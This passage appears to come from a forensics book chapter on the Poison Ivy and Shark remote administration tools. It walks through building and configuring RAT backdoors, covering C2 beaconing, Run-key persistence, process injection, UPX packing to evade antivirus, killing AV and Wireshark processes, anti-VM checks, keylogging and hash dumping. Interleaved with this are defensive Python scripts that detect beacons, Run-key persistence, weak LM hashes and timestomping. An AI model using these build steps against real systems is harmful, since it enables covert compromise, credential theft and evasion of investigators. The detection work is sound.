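        if m:
            procs[m["pid"]] = m["image"].strip()
    return procs


def suspicious_beacons(netstat_text: str, tasklist_text: str,
                       known_good: List[str]) -> List[Beacon]:
    """Established connections to addresses outside the known_good networks."""
    nets = [ipaddress.ip_network(n) for n in known_good]
    procs = parse_tasklist(tasklist_text)
    found: List[Beacon] = []
    for line in netstat_text.splitlines():
        m = NETSTAT_RE.match(line)
        if not m or m["state"] != "ESTABLISHED":
            continue
        host = m["remote"].rpartition(":")[0].strip("[]")  # handles [::1]:port too
        try:
            ip = ipaddress.ip_address(host)
        except ValueError:
            continue                                       # e.g. '*:*' rows
        if any(ip in n for n in nets):
            continue
        found.append(Beacon(m["pid"], procs.get(m["pid"], "<unknown>"),
                            m["local"], m["remote"]))
    return found


# Constructed sample output modelled on the chapter's 192.168.1.34 -> 10.9.2.3:80 case.
NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       980
  TCP    192.168.1.34:139       0.0.0.0:0              LISTENING       4
  TCP    192.168.1.34:1495      10.9.2.3:80            ESTABLISHED     3560
  TCP    192.168.1.34:1502      192.168.1.5:445        ESTABLISHED     4
  UDP    0.0.0.0:445            *:*                                    4
"""
TASKLIST_SAMPLE = """\
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0 Console                    0         28 K
System                           4 Console                    0        236 K
svchost.exe                    980 Console                    0      4,312 K
IEXPLORE.EXE                  3560 Console                    0     24,560 K
"""

if __name__ == "__main__":
    # Assumption: the local LAN is the only known-good destination.
    for b in suspicious_beacons(NETSTAT_SAMPLE, TASKLIST_SAMPLE, ["192.168.1.0/24"]):
        print(f"PID {b.pid} ({b.image}) {b.local} -> {b.remote}")
```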


Process Explorer 


This tool, as part of the sysinternals suite of tools, shows the various active processes and the 
executable names, and what they are dependent on. One of the other good things about this tool 
is that in DLL mode you can see how those processes are linked. This is a great tool for detecting 
malicious DLLs or executables or DLLs that are injected into other processes. However, good 
hackers inject into existing executables running on the system, so careful examination of the run- 
ning processes/PIDs is required to detect various malware. 


[Screenshot: Process Explorer (Sysinternals, www.sysinternals.com) run as BOOYA\Administrator, showing the process tree with Tenable Network Security, VMware Tools and Microsoft processes, and in the lower DLL pane the modules loaded by the selected process (Advanced Windows 32 Base API, Common Controls Library, Crypto API32, GDI Client DLL, IP Helper API, Windows NT BASE API Client DLL, ...); CPU Usage 10.61%, Commit Charge 69.83%, Processes: 39] 


Remote Administration Tools 


Remote administration tools (RATs), such as Poison Ivy and Shark, are used by the hacker to com- 
mand and control his victim. These tools consist of a graphical user interface (GUI) to manage 
multiple compromised victims, and the ability to generate a malicious executable that will beacon 
to a host. The victim runs this command and control software, and whoever operates the host it 
beacons to has full control over the server. However, this is reliant on the attacker getting this 
executable on the victim's system or having the user execute it somehow. 
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Poison Ivy RAT 


Poison Ivy is a free remote administration tool that allows hackers to command and control 
Windows operating systems. Poison Ivy allows a hacker to create a small executable of roughly 
7 KB, which acts as a server to command and control a system. The server's small size and how the 
executable is coded alone makes it more difficult to detect. The Poison Ivy tool itself allows you to 
interact with the server and control the victim. One of the big benefits of this tool is that all that is 
required is the small executable itself. It's important to note that these tools typically communicate 
over encrypted channels, therefore, it’s not easy to determine what is going on over the network 
when running a packet capture as the displayed text is unreadable. Poison Ivy communicates using 
256-bit Camellia encryption and compression. Poison Ivy has a lot of extensive features useful to a 
hacker, such as file management, registry editing, listing processes/services, installing/uninstalling 
applications, remote shells, stealing password hashes, and even keylogging. 


[Screenshot: the Poison Ivy - Remote Administration Tool website (http://www.poisonivy-rat.com/) with news posts "Site/downloads up again" (2008-11-20), "Development" (2008-03-30) and "New plugin: Optix Screen Capture" (2006-02-04)] 


Accepting Poison Ivy Connections 


Before the Poison Ivy server is executed on the victim, we first have to create a server to 
accept connections. Open the Poison Ivy console on the host that it's beaconing to and go to 
File > New Server. This will then start a new client that can start listening for Poison Ivy beacons. 
Notice that you have to designate what port the command and control server should listen on 
and the password. Once a server starts beaconing to this address and port, double click on the 
server to interact with it. It's also important that a port is used that is able to be routed through 
the firewall. 
[Screenshot: Poison Ivy New Server dialog: Listen on Port 443, Prompt for password on new connection, Password, Use Key File, Load Key; status bar Version 2.3.2, Nr. of Ports: 0, Nr. of Plugins: 0, Nr. of Connections: 0] 


Building Poison Ivy Backdoors 


Poison Ivy is used as a backdoor tool to further infiltrate the network; in order to use this tool the 
hacker has to generate an executable and then deploy it on the victim. This is typically after some 
type of administrator access has been exploited via a buffer overflow or even a spearfish attack. Go 
to File > New. Poison Ivy will then prompt you to create a profile. This will designate a profile for 
this scheme of malware that the hacker intends to create so he can come back to this later. 


[Screenshot: Poison Ivy Create Profile dialog with a Profile Name field and the steps Connection, Install, Advanced, Build; status bar Version 2.3.2, Nr. of Ports: 1, Nr. of Plugins: 0, Nr. of Connections: 0] 


Preparing Beaconing Malware 


Next, Poison Ivy will prompt you for the connection to which this malware will beacon. Notice 
also in the upper right-hand corner that the various options selected and added can increase the size 
of the malware. Remember that Poison Ivy will use a reverse connection, meaning it is going to 
beacon out to where you're going to designate. This program will not attack a host. Therefore, you 
have to specify either an IP address or DNS address and a port to connect to. In this option, the 
malware is going to beacon to 10.9.2.3 on port 443. This is designated 10.9.2.3:443:0. However, 
the hacker has the ability to add as many connections as he needs. This would be helpful if the 
command and control server were to get compromised or other beaconing locations are discovered 
and blocked or blacklisted. Notice that this tool also gives you the ability to connect through a 
proxy to mask or forward through a connection. Also notice it has the ability to hijack a proxy, so 
if a victim doesn't have direct access to the Internet it can use Internet Explorer's existing proxy 
settings to get out to the Internet and beacon correctly. 


[Screenshot: Poison Ivy Connection settings for profile admin (Size: 6.21 KiB): DNS/Port 10.9.2.3:443:0, Connect Through Proxy, Hijack Proxy, Persistent (keep trying until found), ID, Group, Password, Use Key File, Load Key / Generate Key; status bar Version 2.3.2, Nr. of Ports: 1] 


Lastly, Poison Ivy has the ability to designate IDs and passwords (which can also use a randomly 
generated keyfile). This is so other hackers don't command and control this server and the hacker 
can identify the malware strain that compromised the system. Once this is finished click Next. 


Preparing Install of Malware 


This section chooses how the malware will be started and copied on the victim's system. One of 
the attacker's goals is to make sure he has retained access if his connection drops for some rea- 
son. So in most intrusion investigations malware automatically starts. Clicking Start on System 
Startup allows designating keys in the registry in which Poison Ivy starts. It also allows Poison 
Ivy to copy itself into another directory, whether it is the System or Windows directory, or within 
an alternate data stream (ADS). Then, lastly, Melt tells the existing executable that was started 
to delete itself after installing. Note that there always has to be a single executable running and 
installed for it to beacon to the command and control server. In most forensics investigations, 
investigators are looking for command and control malware. This key will automatically start 
Poison Ivy whenever a user logs into the system: 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 


[Screenshot: Poison Ivy Install settings showing the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and an entry named ICE2FAA215206F81-2] 
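The install options just described leave two things for an investigator to look for under that Run key: a launch command that points into an alternate data stream, and an entry whose name looks machine-generated rather than like a product name. The following audit is an added example, not from the book or from Poison Ivy; it parses the text that reg query prints (the sample is constructed, with the page's ICE2FAA215206F81-2 entry name and an assumed ADS launch path), and the random-name test is my heuristic, not a Poison Ivy signature.

```python
"""Audit exported Run-key entries for RAT-style persistence.

Added example, not from the book. Input is the text printed by
`reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
(constructed here). Two checks are applied to each value:
  1. the launch path names an NTFS alternate data stream (file:stream);
  2. the value name looks machine-generated (long, no spaces, mostly
     digits) -- a heuristic, not a signature.
"""
import re
from typing import List, NamedTuple

RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
# reg query value lines look like: "    <name>    REG_SZ    <data>"
VALUE_RE = re.compile(r"^\s{2,}(?P<name>.+?)\s{2,}(?P<type>REG_\w+)\s{2,}(?P<data>.+?)\s*$")


class Finding(NamedTuple):
    name: str
    data: str
    reason: str


def launch_path(data: str) -> str:
    """Executable path from a Run value: the quoted token or the first token."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    return data.split(" ", 1)[0]


def has_ads(path: str) -> bool:
    """True if the path names an alternate data stream (a ':' past the drive)."""
    rest = path[2:] if re.match(r"^[A-Za-z]:", path) else path
    return ":" in rest


def looks_generated(name: str) -> bool:
    """Heuristic: 12+ chars, no whitespace, and at least 40% digits."""
    if len(name) < 12 or any(c.isspace() for c in name):
        return False
    digits = sum(c.isdigit() for c in name)
    return digits / len(name) >= 0.4


def audit_run_key(reg_output: str) -> List[Finding]:
    """Return findings for suspicious values under the Run key only."""
    findings: List[Finding] = []
    in_run = False
    for line in reg_output.splitlines():
        if line.startswith("HKEY_"):                      # a key header line
            in_run = line.strip().lower() == RUN_KEY.lower()
            continue
        m = VALUE_RE.match(line)
        if not (in_run and m):
            continue
        name, data = m["name"], m["data"]
        if has_ads(launch_path(data)):
            findings.append(Finding(name, data, "launch path is an alternate data stream"))
        if looks_generated(name):
            findings.append(Finding(name, data, "machine-generated-looking value name"))
    return findings


# Constructed sample; the ADS launch path is an assumption for illustration.
SAMPLE_REG = """\
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
    VMware Tools    REG_SZ    "C:\\Program Files\\VMware\\VMware Tools\\VMwareTray.exe"
    ICE2FAA215206F81-2    REG_SZ    C:\\WINDOWS\\system32\\svchost.exe:updater.exe
    Adobe Reader Speed Launcher    REG_SZ    "C:\\Program Files\\Adobe\\Reader 9.0\\Reader\\Reader_sl.exe"
"""

if __name__ == "__main__":
    for f in audit_run_key(SAMPLE_REG):
        print(f"{f.name}: {f.reason} ({f.data})")
```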


Advanced Poison Ivy Options 


Poison Ivy also has even more advanced features to evade detection. The process Mutex prevents 
multiple copies of an application from running; therefore, if you need to further backdoor and 
run multiple servers of Poison Ivy, make sure that you change the Mutex. Poison Ivy also gives you 
the ability to inject into current processes; the Persistence option will allow the process to restart. 
The hacker is going to want to designate a process to inject into that is pertinent to the system, such 
as svchost.exe. The keylogger functionality is also available, which will record all actions typed. 
Finally, the format allows generating either shellcode, to be modified to prevent detection, or a 
portable executable (PE) itself. Go ahead and click Next. 


[Screenshot: Poison Ivy Advanced settings for profile admin] 
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Generating a PE 


Once all the options have been selected, click Generate to create the PE that can be executed on 
the victim. Notice in the upper right-hand corner all the options selected created a 9.39 KB file. 
Also notice that you can even add an icon within Poison Ivy to make it more legitimate looking. 
Lastly, it can also use third-party applications such as UPX. UPX is a packer that allows the com- 
pression of a portable executable that decreases its size and changes its composition. This makes it 
a little harder to detect via antivirus because its signature has changed. 


[Screenshot: Poison Ivy Build step for profile admin, Size: 9.39 KiB, with the Generate button; status bar Version 2.3.2, Nr. of Ports: 1, Nr. of Plugins: 0, Nr. of Connections: 0] 


Now that the executable has been created, the hacker will take it, transport this file to the 
victim, and execute it. Once this file is executed it will then start beaconing to Poison Ivy itself 
and will be detected and show in the browser of the GUI. If it doesn't, likely the connection 
between the victim and the command and control server is being blocked and a quick port 
change is probably needed, either because it's blocked or because that port is already being used by the 
server. 


Commanding and Controlling Victims with Poison Ivy 


Now that the server has been deployed on the victim and starts beaconing to the command and 
control host, it will appear within Poison Ivy itself. In order to interact with the victim, double 
click on the server. If for some reason the host appears red, right click and restart as it needs to be 
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updated. Notice this gives detailed characteristics about the server such as the ID, wide area net- 
work (WAN), and local area network (LAN) addresses, computer name, and even the user. This 
is helpful for identifying what server has been compromised. 


[Screenshot: Poison Ivy main window, Listening on Port: 443 (Connections: 1), Connections tab listing server admin with WAN and LAN address 10.9.2.3, Direct, computer VICTIM, user Administrator, Admin, Server2003, 2653 MHz, 383.49 MiB; status bar Version 2.3.2, Nr. of Ports: 1, Nr. of Connections: 1] 


Statistics 


The Statistics tab keeps all data about all beacon attempts to the command and control server. It 
also tells you how much data is being sent over the network and the compression ratio of the data. 
This is useful for minimizing data bandwidth use to prevent detection. 


[Screenshot: Poison Ivy Statistics tab, Listening on Port: 443 (Connections: 1): Total successful connections: 2; Sent: Compressed 11.19 KiB, Uncompressed 17.29 KiB, Ratio 55%; Received: Compressed 637 B, Uncompressed 679 B, Ratio 7%] 


Command and Control 


As you can see, Poison Ivy has a lot of flexibility for commanding and controlling a server. 
There are six main tabs in Poison Ivy: Information, Managers, Tools, Surveillance, Plug-ins, and 
Administration. Many of these sections are fairly straightforward. 
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Information 


The Information tab gives you detailed characteristics about the server Poison Ivy is running on 
and characteristics about the server itself, such as its install path, key log path, injected informa- 
tion, and process Mutex. This is important for the hacker if he has generated multiple strains of 
malware and forgets the artifacts of it. 


[Screenshot: Poison Ivy Information tab for server admin [10.9.2.3]: Microsoft Windows Server 2003, Logged on User Administrator, Account Type Admin, Computer Name VICTIM, Workgroup BOOYA, System Uptime 3h 58m 58s, Processor Intel(R) Core(TM)2 Duo CPU P8800, CPU 2653 MHz, RAM 383.49 MB; Server Settings: ID admin, DNS/Port Direct; 10.9.2.3:443, Proxy Hijack No; navigation tree with Installed Applications, Windows, Active Ports, NT/NTLM Hashes, Wireless and Surveillance (Key Logger, Audio Capture, Screen Capture, Webcam Capture); Download 0 B/s, Upload 0 B/s] 


Management 


The Management tab allows you to fully manage the server and perform malicious operations and 
prevent detection. The Management tab has the following options: 

- Files: Manipulate and search for files on the system. 
- Regedit: Manage the registry. 
- Processes: Identify running processes. 
- Services: Identify running services. 
- Devices: Identify running devices. 
- Installed applications: Identify applications installed. 
- Windows: See the current windows that are opened. 


Files 


The Files tab allows you to manipulate and search for files on the system. This tab will also allow 
you to look at the registry and modify it. This may be important for adding more malware and 
further infiltrating into the system. 


Processes 


The Processes tab will allow the hacker to get a list of running processes, and if he sees a process 
such as an antivirus (e.g., Windows Defender or Norton32.exe), the hacker would likely kill this 
process to prevent his actions from being detected. 


[Screenshot: Poison Ivy File Manager showing drives A: (Removable), C: (Fixed, free: 4.74/7.99 GiB) and D: (CDROM); the folders Documents and Settings, Program Files, System Volume Information, WINDOWS and wmpub; and the root files AUTOEXEC.BAT, boot.ini, CONFIG.SYS, IO.SYS, MSDOS.SYS, NTDETECT.COM, ntldr and pagefile.sys (576 MiB); 14 objects, 576.31 MB] 


Tools 


The Tools tab allows the hacker to perform more malicious actions by giving access to a remote 
shell and cracking passwords. This tab has the following options: 

- Relay: Allows you to relay through other servers. 
- Active ports: Shows active ports. 
- Remote shell: Gives the hacker an administrative command prompt. 
- Password audit: Dumps password hashes. 


[Screenshot: Poison Ivy Processes view listing the victim's processes with path, PID and base address (System, smss.exe, csrss.exe, winlogon.exe, services.exe, lsass.exe, several svchost.exe, spoolsv.exe, msdtc.exe, dns.exe, ismserv.exe, ntfrs.exe, vmtoolsd.exe, ...); Processes: 28, CPU Usage 3.5%, Mem Usage 92.41 MB, Threads 355, Handles 7044] 
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Active Ports 


The Active Ports tab gives a list of the active ports on the system. This might be important to the 
hacker if he needs to figure out what this server is doing, or find other computers trying to connect 
to this server in order to try and hack other servers. 


[Screenshot: Poison Ivy Active Ports view on 10.9.2.3 listing listening TCP ports (among them 389, 443, 636, 3268 and 3269), established TCP connections between 10.9.2.3 and 127.0.0.1, and UDP listeners on 445 and 500] 


Password Audit 


The Password Audit tab allows the sniffing of cached passwords and dumps the Windows password 
hashes so that they can be cracked. This is useful to the hacker for enumerating user accounts. 
Lastly, the hacker can also reveal the SSID and even the WEP keys of the network if the machine 
is running wireless and has the plug-in installed. 
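The hash dump this tab produces has the same shape as pwdump output (user:RID:LM hash:NT hash:::), and the value AAD3B435B51404EEAAD3B435B51404EE visible in the LM column of the screenshot is the well-known LM hash of an empty string, meaning no LM hash is stored for that account. As an added example, not from the book and not part of Poison Ivy, this Python script audits such a dump from the defender's side: accounts that still store an LM hash are far cheaper to crack than NT-only accounts, and the well-known empty-NT value 31D6CFE0D16AE931B73C59D7E0C089C0 identifies blank passwords. The sample dump is constructed, and every non-empty hash in it is a fake placeholder rather than a real hash.

```python
import re

EMPTY_LM = "AAD3B435B51404EEAAD3B435B51404EE"   # LM hash of "": LM storage disabled or password > 14 chars
EMPTY_LM_HALF = EMPTY_LM[:16]                   # LM hash of one empty 7-character half
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"   # NT hash of the empty password

# pwdump line layout: user:RID:LM hash:NT hash:::
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9A-Fa-f]{32}):([0-9A-Fa-f]{32}):")

# Constructed sample dump; the non-empty hashes below are fake placeholders, not real hashes.
SAMPLE_DUMP = """\
Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:11111111111111111111111111111111:::
krbtgt:502:AAD3B435B51404EEAAD3B435B51404EE:22222222222222222222222222222222:::
SUPPORT_388945a0:1001:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
legacyuser:1105:33333333333333333333333333333333:44444444444444444444444444444444:::
shortpw:1106:5555555555555555AAD3B435B51404EE:66666666666666666666666666666666:::
# a comment line and a malformed line are skipped by the parser
broken:notanumber:xyz:xyz:::
"""


def parse_pwdump(text):
    """Parse pwdump-format lines into dicts; hashes are normalised to upper case."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        user, rid, lm, nt = m.groups()
        records.append({"user": user, "rid": int(rid), "lm": lm.upper(), "nt": nt.upper()})
    return records


def audit_hashes(records):
    """Return (user, issue) pairs for weak hash storage or blank passwords."""
    findings = []
    for r in records:
        if r["nt"] == EMPTY_NT:
            findings.append((r["user"], "blank-password"))
        if r["lm"] != EMPTY_LM:
            # An LM hash is two independent 7-character halves; an empty second half
            # means the password is at most seven characters long.
            if r["lm"][16:] == EMPTY_LM_HALF:
                findings.append((r["user"], "lm-hash-stored-password-at-most-7-chars"))
            else:
                findings.append((r["user"], "lm-hash-stored"))
    return findings


if __name__ == "__main__":
    for user, issue in audit_hashes(parse_pwdump(SAMPLE_DUMP)):
        print(f"{user}: {issue}")
```

The remediation for every lm-hash-stored finding is the "Network security: Do not store LAN Manager hash value on next password change" policy (the NoLMHash setting) followed by a password change, since the LM hash is only removed when the password is next set; passwords longer than 14 characters cannot be stored as LM at all.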


[Figure: Poison Ivy Password Audit > NT/NTLM Hashes view listing domain accounts (Administrator, krbtgt, a SUPPORT_388... account and a machine account) with an LM hash column and an NT hash column; the LM column shows the AAD3B435B51404EEAAD3B435B51... empty-LM value for each account. The left pane lists Managers, Tools and Surveillance entries.] 
Surveillance 


The next tab is Surveillance; it lets the hacker monitor the computer for valuable information 
through keylogging, audio capture, screen capture, and webcam capture. 


[Figure: Poison Ivy Key Logger tab for the victim admin (10.9.2.3). Captured keystrokes are grouped by window title and time, e.g. "[Program Manager] (2010/30/11 - 00:49) username admin [Enter]" and "[admin [10.9.2.3] - Poison Ivy] (2010/30/11 - 00:50) password 123456$3 [Enter]". The left pane lists Managers (Files, Search, Regedit, Processes, Services, Devices, Installed Applications), NT/NTLM Hashes, Wireless and the Surveillance entries (Key Logger, Audio Capture, Screen Capture, Webcam Capture, Plugins).] 


Shark 


Shark (http://chasenet.org/) is another remote administration tool (RAT) that allows a hacker 
to command and control a PC. Shark has more advanced backdoor capabilities and even better 
antiforensic capabilities. Shark's network communications are encrypted with RC4, it supports 
compressed transfers, it offers keylogging, screen capture, and a command shell, it has 
antidebugging capability, and much more. Like Poison Ivy, Shark relies on the hacker getting 
Shark's executable onto a victim, so the hacker must first generate the malware within Shark 
for it to call back to the host running the Shark client. 


To Create a Server 


In Shark go to File > Create Server. There are quite a few more options in Shark that need to 
be set. Once again the server.exe name, install directory, and password need to be set. However, 
Shark also lets you change the connection interval, also known as the beaconing interval, which 
makes the connections and beacons harder to spot. To avoid easy detection the hacker might set a 
beacon interval of days or weeks. Shark also allows beaconing to many different DNS/IP addresses, 
which again improves the hacker's ability to keep command and control of the server if one of 
his beacon hosts becomes compromised. 
[Figure: Shark Create New Server dialog, Basic Settings; the SIN host entry 10.9.2.3:80 shows "Working!".] 


In the Create New Server menu click on Add to add the SIN-DNS-addresses; this designates 
what this server should beacon to for command and control. 
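A long or slightly randomized connection interval is what makes this kind of beacon hard to see in a short capture; over a longer connection log the regularity is still the giveaway. As an added example, not from the book and not part of Shark, the following Python script groups outbound connections by source, destination and port and flags groups whose inter-arrival times are nearly constant (a low coefficient of variation). The sample log is constructed: it uses the 7-second interval shown later in the compile summary and the lab address 10.9.2.3:80 as the beacon, mixed with irregular browsing to a documentation-range placeholder address.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed connection log: "ISO-timestamp src dst dport". The 10.9.2.3:80 traffic is a
# 7-second beacon with one jittered gap; 198.51.100.20:443 is ordinary irregular browsing.
# Lines are deliberately not in time order.
SAMPLE_LOG = """\
2010-11-30T00:49:00 10.9.2.10 10.9.2.3 80
2010-11-30T00:49:01 10.9.2.10 198.51.100.20 443
2010-11-30T00:49:07 10.9.2.10 10.9.2.3 80
2010-11-30T00:49:14 10.9.2.10 10.9.2.3 80
2010-11-30T00:49:19 10.9.2.10 198.51.100.20 443
2010-11-30T00:49:21 10.9.2.10 10.9.2.3 80
2010-11-30T00:49:28 10.9.2.10 10.9.2.3 80
2010-11-30T00:49:35 10.9.2.10 10.9.2.3 80
2010-11-30T00:49:50 10.9.2.10 198.51.100.20 443
2010-11-30T00:49:52 10.9.2.10 198.51.100.20 443
2010-11-30T00:49:43 10.9.2.10 10.9.2.3 80
2010-11-30T00:51:30 10.9.2.10 198.51.100.20 443
"""


def parse_log(text):
    """Group connection timestamps by (src, dst, dport); input order does not matter."""
    events = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport = line.split()
        events[(src, dst, int(dport))].append(datetime.fromisoformat(ts))
    return events


def detect_beacons(events, min_connections=5, max_cv=0.2):
    """Return (key, mean_gap_seconds, cv) for groups with near-constant inter-arrival times.

    cv is the coefficient of variation (population std dev / mean) of the gaps between
    consecutive connections. A beacon with modest jitter stays well below 0.2, while
    interactive traffic is usually near or above 1.0.
    """
    beacons = []
    for key, times in events.items():
        if len(times) < min_connections:
            continue
        ordered = sorted(times)
        gaps = [(b - a).total_seconds() for a, b in zip(ordered, ordered[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue  # every connection in the same second: a burst, not a period
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            beacons.append((key, round(avg, 2), round(cv, 3)))
    return beacons


if __name__ == "__main__":
    for key, avg, cv in detect_beacons(parse_log(SAMPLE_LOG)):
        print(f"beacon {key[0]} -> {key[1]}:{key[2]} every ~{avg}s (cv={cv})")
```

With a beacon interval of days or weeks, as the text suggests, the same check needs log retention over a correspondingly long window and a lower min_connections threshold; the cost is more false positives from legitimate periodic traffic such as NTP and update checks, which an allow list of known destinations handles.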


Startup 


The startup setting determines how Shark is started at boot or when the computer restarts. 
Shark generates a random ActiveX key and can also add a startup entry under HKCU. 


[Figure: Shark Create New Server > Start Up: Enable ActiveX Startup with a generated ActiveX key; Reg-HKCU Startup (Recommended on Vista); Compile Name: WindowsUpdate. The left pane lists Basic Settings, Start Up, Install Events, Alternative Install, Bind Files, Blacklist, Anti Debugging.] 


Binding 

Shark, like Poison Ivy, has the ability to drop executables onto the victim system and place them 
wherever the hacker pleases. In this example, the hacker attached another command and control 
executable within the Shark executable. Using multiple backdoor methods keeps the hacker from 
losing control of his victim if one of them is detected. The other options allow the attached 
executables to remain hidden when executed or only be extracted. 
[Figure: Shark Create New Server > Bind Files: malware.exe (File: C:\Documents and Settings\Administrator\Desktop\malware.exe) bound with Destination %windir%\malware.exe, size 9,50 KB, start mode Normal, Wait for termination: No. Start modes offered are Normal Start, Hidden Start and Extract Only; %windir%, %sysdir% and %tempdir% can be used as variables in the destination path. Load Settings / Save Settings buttons.] 


Blacklist 


The Blacklist option lets Shark hinder investigation of the machine and of the server itself so 
that it avoids detection. It can kill network-monitoring programs such as tcpdump or Wireshark 
and kill antivirus programs. As you can see, it has different modes, from killing the offending 
process silently to killing Shark itself. This is highly beneficial to the hacker because it prevents 
detection and monitoring of the attacker's actions. 


[Figure: Shark Create New Server > Blacklist. Entries: ethereal (Process: Ask all connected clients what to do now), AntiVirService (Service: Stop service silently), tcpview (Process: Panic Mode 3, Cut connections while proc. running), wireshark (Process: Panic Mode 2, Remove Server), ad-aware (Process: Panic Mode 1, Close Server). "Add new blacklist object" offers Type: Process or Service, a process name field (without extension), and reactions: Kill process silently; Kill process and inform all connected clients; Ask all connected clients what to do now; Panic Mode 1 (Close Server); Panic Mode 2 (Remove Server); Panic Mode 3 (Cut connections while proc. running). Load Settings / Save Settings / Cancel.] 


Stealth 


Stealth allows Shark to set the server file's date and time stamps to the Windows installation time 
of the operating system. This technique is referred to as timestomping in Metasploit, and it changes 
file attributes to prevent detection. Additionally, the server will run in the background, undetected 
by traditional means. 
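Resetting the creation time to the installation time makes the file blend into a directory listing sorted by date, but it leaves a contradiction a defender can test for: a file laid down by Setup normally has a last-modified time no later than its creation time (the modification time is preserved from the installation media), whereas a dropped file carries the time it was actually written. As an added example, not from the book and not part of Shark, this Python script applies that heuristic together with the hidden+system attribute combination the Stealth option sets, over constructed file metadata. The installation time, paths, timestamps and attributes are all constructed; the explorer.exe name comes from the compile summary later in the chapter.

```python
from datetime import datetime, timedelta
from typing import NamedTuple


class FileRecord(NamedTuple):
    path: str
    created: datetime      # creation time as reported by the file system ($STANDARD_INFORMATION on NTFS)
    modified: datetime     # last write time
    hidden: bool
    system: bool


# Constructed installation time for the sample host (on a real host this comes from the
# InstallDate value under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion).
OS_INSTALL_TIME = datetime(2010, 3, 15, 9, 12, 44)

# Constructed sample: two files laid down by Setup, one dropped file whose creation time was
# rewound to the installation time and marked hidden+system, and one ordinary user file.
SAMPLE_FILES = [
    FileRecord(r"C:\WINDOWS\system32\kernel32.dll", OS_INSTALL_TIME, datetime(2008, 4, 14, 0, 12), False, False),
    FileRecord(r"C:\WINDOWS\system32\ntdll.dll", OS_INSTALL_TIME, datetime(2008, 4, 14, 0, 12), False, False),
    FileRecord(r"C:\WINDOWS\system32\explorer.exe", OS_INSTALL_TIME, datetime(2010, 11, 30, 0, 50, 3), True, True),
    FileRecord(r"C:\WINDOWS\Temp\report.txt", datetime(2010, 11, 29, 16, 0), datetime(2010, 11, 29, 16, 5), False, False),
]


def timestomp_indicators(rec, install_time, tolerance=timedelta(seconds=2), min_gap=timedelta(days=1)):
    """Return the reasons a file looks like a backdated drop (empty list if none)."""
    reasons = []
    created_at_install = abs(rec.created - install_time) <= tolerance
    # Files copied by Setup keep their older modification time; a file "created" at install
    # time but written long afterwards contradicts that.
    if created_at_install and rec.modified - rec.created >= min_gap:
        reasons.append("created-at-install-but-modified-much-later")
    # hidden+system together is how the Stealth option marks the server; such files should be
    # reviewed against a known-good baseline of the system directory.
    if rec.hidden and rec.system:
        reasons.append("hidden-and-system-attributes")
    return reasons


def scan(files, install_time=OS_INSTALL_TIME):
    """Map path -> reasons for every file with at least one indicator."""
    hits = {}
    for rec in files:
        reasons = timestomp_indicators(rec, install_time)
        if reasons:
            hits[rec.path] = reasons
    return hits


if __name__ == "__main__":
    for path, reasons in scan(SAMPLE_FILES).items():
        print(path, ", ".join(reasons))
```

Windows Update can produce the same created-at-install, modified-later pattern for patched system files, so the first check is a triage signal rather than proof. On NTFS the stronger test is to compare these $STANDARD_INFORMATION timestamps with the $FILE_NAME timestamps in the MFT record, which user-mode timestomping does not rewrite.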
[Figure: Shark Create New Server > Stealth. Manipulation: Modify File-Creation Time of server (sets the creation time to the Windows installation time); Modify File-Attributes (sets server as "hidden" and as a "system file"); Melt Server. Server Type: Visible Server (good for local testing); Hidden Server (runs in the background); Aggressive Server (runs in the background and forces the Startup Entries every few seconds). Misc: Only open ports when online; Sleep until next reboot (requires Startup). Delayed Connections: Days / Mins, with a note that the connection interval set in Basic Settings also applies; Enable Connection checkbox.] 


Antidebugging 


This is one of the most powerful features of Shark: when Shark detects that a debugger or sandbox 
is running while the server executes, it kills itself. The reason is that an investigator who finds 
malware on a victim will often need to test it in a controlled environment such as VMware or 
Norman Sandbox. To keep the malware from being analyzed, Shark checks specific variables and 
processes, and if one of these programs is detected it immediately concludes that an investigator 
is examining the Shark server as malware. At that point Shark shuts down so the investigator 
cannot look at it. This aids the attacker: the investigator will be unable to observe beacons to 
unknown IP addresses and ports, and the command and control server is kept from being 
compromised. 


[Figure: Shark Create New Server > Anti Debugging. Debugger Detection: Terminate Server when Debugger is present. Sandbox Detection: Terminate Server when being started on "Norman Sandbox". VM-Ware Detection: Terminate Server when it's being started on "VMWare Workstation"; Show message when it's detected: "This program cannot be run on a virtual machine."] 


Compile 


Once all the options are set, click Compile to create the executable. You also have the ability to 
generate an .exe, .scr, .pif, .cmd, .bat, and .com file. 
[Figure: Shark Create New Server > Compile log: checking your settings; Preparing Compiler; Preparing Stub; Loading Stub; checking for win32-File; Converting Header; Encrypting Header; Writing Header to Stub (427 Byte); Writing Pointer (43608); successfully Compiled! Dialog: "server.exe" has successfully been built, size 269,93 KB.] 


Compile Summary 


Servername: admin 
Server EXE name: explorer.exe 
Target directory: System directory 
Group name: My Group 
Server password: iiid 
Connection interval: 7 seconds 
Used stub: stub.shark 
ActiveX startup: Activated - Key: (DB897B73-C638-COAF-A390-AB2F2800CASE) 
HKCU startup: Activated - Name: Windows Update 
SIN Hosts: 10.9.2.3:80 (Working!) 

Blacklist 
Process: ethereal. Reaction: Ask all connected clients what to do now 
Service: AntiVirService. Reaction: Stop service silently 
